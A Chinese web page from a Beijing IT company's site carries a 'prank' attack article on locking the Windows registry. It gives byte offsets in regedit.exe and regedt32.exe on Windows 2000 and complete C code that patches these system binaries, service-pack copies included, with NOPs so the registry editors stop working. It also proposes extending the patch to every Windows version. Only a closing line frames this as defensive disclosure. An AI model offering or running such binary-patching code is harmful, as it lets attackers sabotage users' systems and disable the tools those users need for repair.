客户留言
 

公司介绍

 
 
  服务项目  
  特色服务  
 
  产品介绍  
  成功案例  
  公司新闻  
  常见问题  
  企业邮箱  

 


 
 
首页防毒杀毒→攻防技术:整蛊之注册表终极操作 ——锁定注册表


攻防技术:整蛊之注册表终极操作 ——锁定注册表

  你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:

  修改[HKEY_CURRENT_USER\Software\
Microsoft\Windows\Current
Version\Policies\System]下的DisableRegistryTools值为1
  解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………


  今天我就教大家写个程序来实现另类锁定,是不是很好奇了?跟我来。

  实验环境:windows2000
  实验目的:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)
  实现方法:C程序

  首先我们要按照Cracker的思路反汇编WINNT下的regedit.exe和regedt32.exe找到跳转指令,怎么得到这些信息不是我们今天的目的,这里我就不详细介绍了,以下是我反汇编找到的跳转地址:
  1.regedit.exe
偏移地址:0x69CA 将指令:0x74 0x1A 修改成:0x90 0x90

  2.regedt32.exe
偏移地址:0x10bf2 将指令:0x74 0x52 修改成:0x90 0x90

  现在我们用程序把这2个偏移地址的指令给修改成0x90 0x90 ( 0x90代表nop,就是让程序什么也不做,执行下一条指令)让我们看看程序是如何实现的吧。

#include
#include
bool scanreg(const char *file,long offset, int length,char *the); /*函数说明*/

main()
{
char the[]={ 0x90,0x90 };
scanreg("C:\\WINNT\\regedit.exe",0x69CA,0x02,the); /*调用函数修改winnt下的regedit.exe 其中的0x02是修改长度*/
scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedit.exe",0x69CA,0x02,the); /*调用函数改变补丁下regedit.exe*/
scanreg("C:\\WINNT\\system32\\regedt32.exe",0x10bf2,0x02,the); /*调用函数修改system32下的regedt32.exe */
scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedt32.exe",0x10bf2,0x02,the); /*调用函数改变补丁下regedt32.exe*/
}
bool scanreg(const char *file,long offset, int length,char *the)
{
FILE *fp = NULL;
bool result=false;
if((fp=fopen(file,"rb+"))!=NULL) /*打开文件进行读写操作*/
{
fseek(fp,offset,1); /*把指针指向我们定义的偏移地址*/
fwrite(the,length,1,fp); /*修改程序,把指令替换成0x90*/
fclose(fp); /*关闭文件*/
result=true;
}
return(result);
}

  好了,我这里只是一个示范,只适合2000系统,把windows每种系统的注册表调用程序都分析一下,然后在程序开始用API函数GetVersionEx(LPOSVERSIONINFO lpVersionInfo)判断系统,根据判断的系统来调用相应的修改函数。那不是通杀windows了?上面把方法公布出来,以便大家做好防范。

关于我们 客户服务 友情连接 网站地图 人才招聘 代理合作

北京仁思网络科技发展有限公司
电话:68419711/13810679061
地址:北京市海淀区紫竹桥昌运宫17号310室